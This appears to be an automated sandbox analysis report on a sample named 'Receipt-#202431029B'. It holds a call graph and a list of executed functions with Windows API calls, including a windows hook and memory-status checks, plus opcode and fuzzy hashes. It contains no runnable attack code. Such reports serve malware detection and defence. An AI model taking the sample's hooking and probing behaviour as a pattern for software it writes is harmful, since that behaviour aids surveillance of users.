41285->41265 41286->41284 41287 53758c7 2 API calls 41286->41287 41288 53758d8 2 API calls 41286->41288 41287->41285 41288->41285 41290 53758d8 41289->41290 41309 5375e10 41290->41309 41314 5375e40 41290->41314 41291 5375986 41292 53704d0 GetModuleHandleW 41291->41292 41294 53759b2 41291->41294 41293 53759f6 41292->41293 41295 53767b2 CreateWindowExW 41293->41295 41296 53767c0 CreateWindowExW 41293->41296 41295->41294 41296->41294 41300 5375903 41299->41300 41307 5375e10 GetModuleHandleW 41300->41307 41308 5375e40 GetModuleHandleW 41300->41308 41301 5375986 41304 53759b2 41301->41304 41319 53704d0 41301->41319 41307->41301 41308->41301 41310 5375e0a 41309->41310 41310->41309 41311 5375eee 41310->41311 41312 5375fb0 GetModuleHandleW 41310->41312 41313 5375fa0 GetModuleHandleW 41310->41313 41312->41311 41313->41311 41315 5375e6d 41314->41315 41316 5375eee 41315->41316 41317 5375fb0 GetModuleHandleW 41315->41317 41318 5375fa0 GetModuleHandleW 41315->41318 41317->41316 41318->41316 41320 5371290 GetModuleHandleW 41319->41320 41322 5371305 41320->41322 41323 53767c0 41322->41323 41326 53767b2 41322->41326 41324 5374614 CreateWindowExW 41323->41324 41325 53767f5 41324->41325 41325->41304 41327 53767c0 41326->41327 41328 5374614 CreateWindowExW 41327->41328 41329 53767f5 41328->41329 41329->41304 41361 114d0fc 41362 114d114 41361->41362 41363 114d16e 41362->41363 41369 5376af0 41362->41369 41373 53769c8 41362->41373 41379 53769b8 41362->41379 41385 537462c 41362->41385 41389 537463c 41362->41389 41370 5376aed 41369->41370 41370->41369 41398 5374664 41370->41398 41372 5376b07 41372->41363 41374 53769ee 41373->41374 41375 537462c 2 API calls 41374->41375 41376 53769fa 41375->41376 41377 537463c CallWindowProcW 41376->41377 41378 5376a0f 41377->41378 41378->41363 41380 53769c8 41379->41380 41381 537462c 2 API calls 41380->41381 41382 53769fa 41381->41382 41383 537463c CallWindowProcW 41382->41383 41384 5376a0f 41383->41384 41384->41363 41386 5374637 41385->41386 41387 5374664 2 API calls 41386->41387 41388 5376b07 41387->41388 41388->41363 41392 5374647 41389->41392 41390 5377799 41426 5374764 41390->41426 41392->41390 41393 5377789 41392->41393 41410 53778b0 41393->41410 41415 53778c0 41393->41415 41420 537798c 41393->41420 41394 5377797 41394->41394 41399 537466f 41398->41399 41400 53704d0 GetModuleHandleW 41399->41400 41402 5376bd8 41399->41402 41400->41402 41401 5376d96 41402->41401 41404 5376a28 41402->41404 41407 537464c 41404->41407 41408 5376a58 SetWindowLongW 41407->41408 41409 5376a40 41408->41409 41409->41401 41411 53778d4 41410->41411 41430 5377967 41411->41430 41434 5377978 41411->41434 41412 5377960 41412->41394 41416 53778d4 41415->41416 41418 5377967 CallWindowProcW 41416->41418 41419 5377978 CallWindowProcW 41416->41419 41417 5377960 41417->41394 41418->41417 41419->41417 41421 537794a 41420->41421 41422 537799a 41420->41422 41424 5377967 CallWindowProcW 41421->41424 41425 5377978 CallWindowProcW 41421->41425 41423 5377960 41423->41394 41424->41423 41425->41423 41427 537476f 41426->41427 41428 5378e7a CallWindowProcW 41427->41428 41429 5378e29 41427->41429 41428->41429 41429->41394 41431 5377978 41430->41431 41433 5377989 41431->41433 41437 5378db0 41431->41437 41433->41412 41435 5377989 41434->41435 41436 5378db0 CallWindowProcW 41434->41436 41435->41412 41436->41435 41438 5374764 CallWindowProcW 41437->41438 41439 5378dca 41438->41439 41439->41433 41122 139f2b0 41123 139f2b4 41122->41123 41127 537fcc7 41123->41127 41132 537fcd8 41123->41132 41137 537fde0 41123->41137 41129 537fd04 41127->41129 41128 537fe09 41128->41123 41129->41128 41142 7500040 41129->41142 41147 7500006 41129->41147 41134 537fd04 41132->41134 41133 537fe09 41133->41123 41134->41133 41135 7500040 3 API calls 41134->41135 41136 7500006 3 API calls 41134->41136 41135->41134 41136->41134 41138 537fdb7 41137->41138 41139 537fe09 41138->41139 41140 7500040 3 API calls 41138->41140 41141 7500006 3 API calls 41138->41141 41139->41123 41140->41138 41141->41138 41143 7500065 41142->41143 41152 75008b0 41143->41152 41157 75008a1 41143->41157 41144 7500146 41144->41144 41148 7500065 41147->41148 41150 75008b0 3 API calls 41148->41150 41151 75008a1 3 API calls 41148->41151 41149 7500146 41149->41149 41150->41149 41151->41149 41153 75008c5 41152->41153 41162 75075c0 41153->41162 41167 75075b0 41153->41167 41154 7500b22 41154->41144 41158 75008c5 41157->41158 41160 75075c0 3 API calls 41158->41160 41161 75075b0 3 API calls 41158->41161 41159 7500b22 41159->41144 41160->41159 41161->41159 41163 75075e5 41162->41163 41172 7507857 41163->41172 41177 7507868 41163->41177 41164 7507647 41164->41154 41168 75075c0 41167->41168 41170 7507857 3 API calls 41168->41170 41171 7507868 3 API calls 41168->41171 41169 7507647 41169->41154 41170->41169 41171->41169 41173 7507868 41172->41173 41181 7507890 41173->41181 41189 75078a0 41173->41189 41174 7507876 41174->41164 41179 7507890 2 API calls 41177->41179 41180 75078a0 2 API calls 41177->41180 41178 7507876 41178->41164 41179->41178 41180->41178 41182 75078a0 41181->41182 41183 75078ad 41182->41183 41197 7506b10 41182->41197 41183->41174 41185 75078f6 41185->41174 41187 75079be GlobalMemoryStatusEx 41188 75079ee 41187->41188 41188->41174 41190 75078d5 41189->41190 41191 75078ad 41189->41191 41192 7506b10 GlobalMemoryStatusEx 41190->41192 41191->41174 41194 75078f2 41192->41194 41193 75078f6 41193->41174 41194->41193 41195 75079be GlobalMemoryStatusEx 41194->41195 41196 75079ee 41195->41196 41196->41174 41198 7507978 GlobalMemoryStatusEx 41197->41198 41200 75078f2 41198->41200 41200->41185 41200->41187 41453 139a000 41454 139a00e 41453->41454 41457 1399c18 41454->41457 41456 139a017 41458 1399c23 41457->41458 41461 1399c84 41458->41461 41460 139a165 41460->41456 41462 1399c8f 41461->41462 41465 1399cec 41462->41465 41464 139a225 41464->41460 41466 1399cf7 41465->41466 41469 1399d88 41466->41469 41468 139a302 41468->41464 41470 1399d93 41469->41470 41473 139aaf4 41470->41473 41472 139b02c 41472->41468 41474 139aaff 41473->41474 41475 139e321 41474->41475 41476 53727b8 4 API calls 41474->41476 41477 53727c8 4 API calls 41474->41477 41475->41472 41476->41475 41477->41475 41478 13976c0 41480 1397704 SetWindowsHookExW 41478->41480 41481 139774a 41480->41481 41201 537bc38 PeekMessageW 41202 537bcaf 41201->41202 41330 5370fa8 41334 53710a0 41330->41334 41344 537109e 41330->41344 41331 5370fb7 41335 53710b1 41334->41335 41338 53710d4 41334->41338 41336 53704d0 GetModuleHandleW 41335->41336 41337 53710bc 41336->41337 41337->41338 41354 5371328 41337->41354 41358 5371338 41337->41358 41338->41331 41339 53710cc 41339->41338 41340 53712d8 GetModuleHandleW 41339->41340 41341 5371305 41340->41341 41341->41331 41345 53710a0 41344->41345 41346 53704d0 GetModuleHandleW 41345->41346 41349 53710d4 41345->41349 41347 53710bc 41346->41347 41347->41349 41352 5371338 GetModuleHandleW 41347->41352 41353 5371328 GetModuleHandleW 41347->41353 41348 53710cc 41348->41349 41350 53712d8 GetModuleHandleW 41348->41350 41349->41331 41351 5371305 41350->41351 41351->41331 41352->41348 41353->41348 41355 5371338 41354->41355 41356 53704d0 GetModuleHandleW 41355->41356 41357 537134c 41356->41357 41357->41339 41359 53704d0 GetModuleHandleW 41358->41359 41360 537134c 41359->41360 41360->41339 41440 537b0d8 41441 537b100 41440->41441 41444 537b12c 41440->41444 41442 537b109 41441->41442 41445 537a52c 41441->41445 41447 537a537 41445->41447 41446 537b423 41446->41444 41447->41446 41449 537a548 41447->41449 41450 537a54f OleInitialize 41449->41450 41452 537b4bc 41450->41452 41452->41446

                                                                  Executed Functions

                                                                  Function 053710A0 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4106947630.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5370000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID:
                                                                  • API String ID: 4139908857-0
                                                                  • Opcode ID: 1a494ddc0f021d400ab74e1ea37e8769e1a01717a028cf613ff91ff7605e0f01
                                                                  • Instruction ID: 62421988254379975c4253ace5c6c61c40323d63c179a5b7c1f559b7ee973db3
                                                                  • Opcode Fuzzy Hash: 1a494ddc0f021d400ab74e1ea37e8769e1a01717a028cf613ff91ff7605e0f01
                                                                  • Instruction Fuzzy Hash: AC713671A00B098FDB24DF6AD44475ABBF6FF88304F00892DD49ADBA50DB79E845CB90
                                                                  Function 075078A0 Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4108912612.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7500000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8fca9f5b4f2b5575f4b8abdeff95e1adbf093ba1e3c1cee22758e45ef10270b3
                                                                  • Instruction ID: b46da832735f768b08716bad4cd72f919302bed761bb0ef8a6dace0acf221fd2
                                                                  • Opcode Fuzzy Hash: 8fca9f5b4f2b5575f4b8abdeff95e1adbf093ba1e3c1cee22758e45ef10270b3
                                                                  • Instruction Fuzzy Hash: 704101B1D043598FCB14DFB9D8046DABBF5AF89320F15896AD408E7281DB749984CBE1
                                                                  Function 05374614 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05376922
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4106947630.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5370000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: CreateWindow
                                                                  • String ID:
                                                                  • API String ID: 716092398-0
                                                                  • Opcode ID: 9fb7b457ed0926977c2e053a2bb660a88c0edd6a121b00a91ed5cbf32146a525
                                                                  • Instruction ID: 28c994500111afe53ad637950f3ca25c3afa1a333901131ef50dca9bfc57bf76
                                                                  • Opcode Fuzzy Hash: 9fb7b457ed0926977c2e053a2bb660a88c0edd6a121b00a91ed5cbf32146a525
                                                                  • Instruction Fuzzy Hash: 0A51BFB1D10309AFDB14CF99C995ADEBBF5FF48310F24852AE819AB210D7759845CF90
                                                                  Function 05376804 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05376922
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4106947630.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5370000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: CreateWindow
                                                                  • String ID:
                                                                  • API String ID: 716092398-0
                                                                  • Opcode ID: 76466240cad0db002443fd4f3cccc7c81e1eec9c4dee7cd0e16ccf41278cfdbe
                                                                  • Instruction ID: 82f17dbddc79756f99729a5d29abcf9459c5f7de2985afbc06172d3243a427ac
                                                                  • Opcode Fuzzy Hash: 76466240cad0db002443fd4f3cccc7c81e1eec9c4dee7cd0e16ccf41278cfdbe
                                                                  • Instruction Fuzzy Hash: 1651CEB1D103499FDB15CF9AC894ADEBBF5FF88300F24852AE819AB210D7749845CF90
                                                                  Function 05374764 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 05378EA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4106947630.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5370000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: CallProcWindow
                                                                  • String ID:
                                                                  • API String ID: 2714655100-0
                                                                  • Opcode ID: dd95bc21687440e3a4eb8b0b34f888044ffc89cff7a8b4cad27da1e30ab16b05
                                                                  • Instruction ID: 47e58d29f9f1ba567bb613add4490207378f9daec96aa45b63a34a9aa05f6eca
                                                                  • Opcode Fuzzy Hash: dd95bc21687440e3a4eb8b0b34f888044ffc89cff7a8b4cad27da1e30ab16b05
                                                                  • Instruction Fuzzy Hash: 9F4117B9900309CFDB14CF99C488AAAFBF5FF88314F248459E519A7761D778A841CBA0
                                                                  Function 0139AF20 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0139B2B6,?,?,?,?,?), ref: 0139B377
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4102033463.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_1390000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  • Opcode ID: 42a73b5d79270fa0775930d94d3bd51e8b162b1243c5a4477fe6e71469f5be6e
                                                                  • Instruction ID: 2d8197c8b4760a32cbedca7eeffcc33a78c5214022b9138982247f74856d9917
                                                                  • Opcode Fuzzy Hash: 42a73b5d79270fa0775930d94d3bd51e8b162b1243c5a4477fe6e71469f5be6e
                                                                  • Instruction Fuzzy Hash: A921E3B5900248AFDB10CF9AD884ADEFBF8EB48314F14841AE918A3350D374A954CFA5
                                                                  Function 0139B2E8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0139B2B6,?,?,?,?,?), ref: 0139B377
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4102033463.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_1390000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  • Opcode ID: a5cc111a9683ba9a600d8b3990c8074f8710c4a040958695b4ede3c673f4d89b
                                                                  • Instruction ID: f6515d51501566e4f7eae7ef8c1897eecdaab35e7b5844a0cdb803d057355155
                                                                  • Opcode Fuzzy Hash: a5cc111a9683ba9a600d8b3990c8074f8710c4a040958695b4ede3c673f4d89b
                                                                  • Instruction Fuzzy Hash: E621E4B5900308AFDB10CFAAD984ADEFFF4EB48324F14841AE918A3350D374A954CF65
                                                                  Function 0537A558 Relevance: 1.6, APIs: 1, Instructions: 64comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • OleInitialize.OLE32(00000000), ref: 0537B4AD
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4106947630.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5370000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: Initialize
                                                                  • String ID:
                                                                  • API String ID: 2538663250-0
                                                                  • Opcode ID: d9ff66d97f1a18c3bdcbb78ed5370ef651ebd0711a5ced5c0c131366719f0648
                                                                  • Instruction ID: 135a613f8af2ba12059c73dec03e76ac3553eeae567027a4ff9dcf57ce2eaa64
                                                                  • Opcode Fuzzy Hash: d9ff66d97f1a18c3bdcbb78ed5370ef651ebd0711a5ced5c0c131366719f0648
                                                                  • Instruction Fuzzy Hash: 862163B2C043588FDB21EFADD8447DABBF4EF98321F10844AC059A7251D6389948CBA6
                                                                  Function 013976B8 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 0139773B
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4102033463.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_1390000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: HookWindows
                                                                  • String ID:
                                                                  • API String ID: 2559412058-0
                                                                  • Opcode ID: 73928a007cd8623766e83b3e1583d6a7ad9cfe5e91704d3b5582030e8c1f6cbe
                                                                  • Instruction ID: ee9fe8302289c1e5596a170594f13230b27639183fd2b21fd9c7a656be1d2025
                                                                  • Opcode Fuzzy Hash: 73928a007cd8623766e83b3e1583d6a7ad9cfe5e91704d3b5582030e8c1f6cbe
                                                                  • Instruction Fuzzy Hash: 942149B5D002099FDB14DFA9C844BEEFBF5FB88314F10841AD419A7290C774A945CFA0
                                                                  Function 013976C0 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 0139773B
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4102033463.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_1390000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: HookWindows
                                                                  • String ID:
                                                                  • API String ID: 2559412058-0
                                                                  • Opcode ID: fc096c2c1f362e88c29ba37cc67db9296bf9d152646cb592a8cbb3afe4ed6cca
                                                                  • Instruction ID: f373f5367ccf64ca3e09f4b8995eae4c91a74cbbfe9527b7cf6445396569541a
                                                                  • Opcode Fuzzy Hash: fc096c2c1f362e88c29ba37cc67db9296bf9d152646cb592a8cbb3afe4ed6cca
                                                                  • Instruction Fuzzy Hash: C42124B5D102099FDB14DFAAD844BEEFBF5FB88314F10842AD419A7290CB74A944CFA1
                                                                  Function 07507970 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,075078F2), ref: 075079DF
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4108912612.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7500000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: GlobalMemoryStatus
                                                                  • String ID:
                                                                  • API String ID: 1890195054-0
                                                                  • Opcode ID: 7d7dc3224b227dba1be7fa25ad7e6272f3bbb2c7dbf4c846eadb71cda6104383
                                                                  • Instruction ID: 41973baf7dee76275b1d0b984ce3edcc2e62166230ed0489d6da434f68d652d7
                                                                  • Opcode Fuzzy Hash: 7d7dc3224b227dba1be7fa25ad7e6272f3bbb2c7dbf4c846eadb71cda6104383
                                                                  • Instruction Fuzzy Hash: B71103B1C006599BCB10DFAAC445ADEFBF4EB48320F11852AE818B7240D778A954CFA1
                                                                  Function 0537BC30 Relevance: 1.6, APIs: 1, Instructions: 55windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • PeekMessageW.USER32(?,?,?,?,?), ref: 0537BCA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4106947630.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5370000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePeek
                                                                  • String ID:
                                                                  • API String ID: 2222842502-0
                                                                  • Opcode ID: a9a97094e7d56dd83867a4589bb9cbab50e6efc73c1b44545a36d450c2e2f690
                                                                  • Instruction ID: 42b32213a019567df5de6d9658c2beca5e5f1bdda459ab58c85594d734a522b4
                                                                  • Opcode Fuzzy Hash: a9a97094e7d56dd83867a4589bb9cbab50e6efc73c1b44545a36d450c2e2f690
                                                                  • Instruction Fuzzy Hash: DD21E3B58002099FDB10CF9AD585BEEBBF8FB48310F10842AE559A3651D3789544CFA5
                                                                  Function 07506B10 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,075078F2), ref: 075079DF
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4108912612.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7500000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: GlobalMemoryStatus
                                                                  • String ID:
                                                                  • API String ID: 1890195054-0
                                                                  • Opcode ID: 276660bb35f42b6a35a0df055bcbacdd8a0a7db7eda57f0fa455741ff8e785f4
                                                                  • Instruction ID: 9a3038cb71b865ea1346e46f1ad2776a6de40bc1228c9b3a0dcd8955377adb12
                                                                  • Opcode Fuzzy Hash: 276660bb35f42b6a35a0df055bcbacdd8a0a7db7eda57f0fa455741ff8e785f4
                                                                  • Instruction Fuzzy Hash: 5C11F4B1C006599BCB10DFAAC445ADEFBF4EB48310F11896AD818A7281D778A954CFE1
                                                                  Function 0537BC38 Relevance: 1.6, APIs: 1, Instructions: 52windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • PeekMessageW.USER32(?,?,?,?,?), ref: 0537BCA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4106947630.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5370000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePeek
                                                                  • String ID:
                                                                  • API String ID: 2222842502-0
                                                                  • Opcode ID: 1bfaf8370beb596842eeea08a6a5bc5faa2304e81b6b96ba983763b1b272ce2c
                                                                  • Instruction ID: d0d8dbd2b4c9f39e29ebe1cef0e4a24e4791ef07bd150251a8d357d53b7a4ea8
                                                                  • Opcode Fuzzy Hash: 1bfaf8370beb596842eeea08a6a5bc5faa2304e81b6b96ba983763b1b272ce2c
                                                                  • Instruction Fuzzy Hash: C511F3B5C002499FDB10CF9AD984BDEFBF8FB48320F10842AE958A3251D378A544CFA5
                                                                  Function 053704D0 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,053710BC), ref: 053712F6
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4106947630.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5370000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID:
                                                                  • API String ID: 4139908857-0
                                                                  • Opcode ID: a88c9ce5413071b64f07f06c680f33054436682499c915191588df3aee6df4ff
                                                                  • Instruction ID: 01bb6fe6158f1f0c13a42178e355c85b28c89e5f85321dba9466fc4b1201b54f
                                                                  • Opcode Fuzzy Hash: a88c9ce5413071b64f07f06c680f33054436682499c915191588df3aee6df4ff
                                                                  • Instruction Fuzzy Hash: 9A11F0B6C007498FDB20DF9AC448ADEFBF9EB88310F10845AD429B7600D779A545CFA5
                                                                  Function 0537464C Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,05376A40,?,?,?,?), ref: 05376AB5
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4106947630.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5370000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: LongWindow
                                                                  • String ID:
                                                                  • API String ID: 1378638983-0
                                                                  • Opcode ID: 6a2b1db489c8aec85063c585a3b7c6be3b701c63f5b3f3c96b0fd56480ee9411
                                                                  • Instruction ID: 9eb82cc52b48643934cac1d9b9adcbf5e66de89abc4bccd8f8f58b8e24405d72
                                                                  • Opcode Fuzzy Hash: 6a2b1db489c8aec85063c585a3b7c6be3b701c63f5b3f3c96b0fd56480ee9411
                                                                  • Instruction Fuzzy Hash: 7611F5B58007489FDB20DF9AD589B9EBBF8EB48320F208419D919A7741C379A944CFA5
                                                                  Function 0537A548 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • OleInitialize.OLE32(00000000), ref: 0537B4AD
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4106947630.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5370000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: Initialize
                                                                  • String ID:
                                                                  • API String ID: 2538663250-0
                                                                  • Opcode ID: 95a98fdce8b2c20326ec44eab92ec15a7c2274ad735446d96474ef26f7969a9c
                                                                  • Instruction ID: 07bfc7b09604a3423f946ef8f2789ab3a2e99fda54739fda45248d6fe694944c
                                                                  • Opcode Fuzzy Hash: 95a98fdce8b2c20326ec44eab92ec15a7c2274ad735446d96474ef26f7969a9c
                                                                  • Instruction Fuzzy Hash: E21115B5C007488FDB20DF9AD449B9EFBF8EB48324F108459D519A7200D778A944CFA5
                                                                  Function 05376A50 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,05376A40,?,?,?,?), ref: 05376AB5
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4106947630.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5370000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: LongWindow
                                                                  • String ID:
                                                                  • API String ID: 1378638983-0
                                                                  • Opcode ID: d19d8b25e2e50368c45a7f5d3485a420ff8519b0db185c8d8a458113e3a39cf3
                                                                  • Instruction ID: b97d77d909e22aef228023b30ff165646f39d2030c63b05a51c6636f303e2272
                                                                  • Opcode Fuzzy Hash: d19d8b25e2e50368c45a7f5d3485a420ff8519b0db185c8d8a458113e3a39cf3
                                                                  • Instruction Fuzzy Hash: 6E1136B58007089FDB10CF99C585BDEBBF8EB48320F208509D919A3340C379A944CFA1
                                                                  Function 0537B450 Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • OleInitialize.OLE32(00000000), ref: 0537B4AD
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4106947630.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5370000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: Initialize
                                                                  • String ID:
                                                                  • API String ID: 2538663250-0
                                                                  • Opcode ID: 1cf5d206315600d9bd1352575789666ecfabe4cdf2946f3320ea760f69315e76
                                                                  • Instruction ID: b45685b4bf87c3eb65a32a182376d9768bf12a16c000b3105687bca6a8b4cdab
                                                                  • Opcode Fuzzy Hash: 1cf5d206315600d9bd1352575789666ecfabe4cdf2946f3320ea760f69315e76
                                                                  • Instruction Fuzzy Hash: 151130B5C003488FCB20DFA9C549BDEBBF4EB48320F20885AD519A3210D379A944CFA0
                                                                  Function 0113D428 Relevance: .1, Instructions: 75COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4100514357.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_113d000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f2f9057efbdcd10dd0cab5031caccac30f3d5e8845b5ae0337be16e41b50eee7
                                                                  • Instruction ID: f3166c299b1427164be9d700afaad98665e944badd23a51f2b5e9162fa640bcd
                                                                  • Opcode Fuzzy Hash: f2f9057efbdcd10dd0cab5031caccac30f3d5e8845b5ae0337be16e41b50eee7
                                                                  • Instruction Fuzzy Hash: BF2133B1504200EFDF09DF58E9C4B66BFA5FBD4324F60C569E90A0B64AC336E456C7A2
                                                                  Function 0114D2B4 Relevance: .1, Instructions: 72COMMON
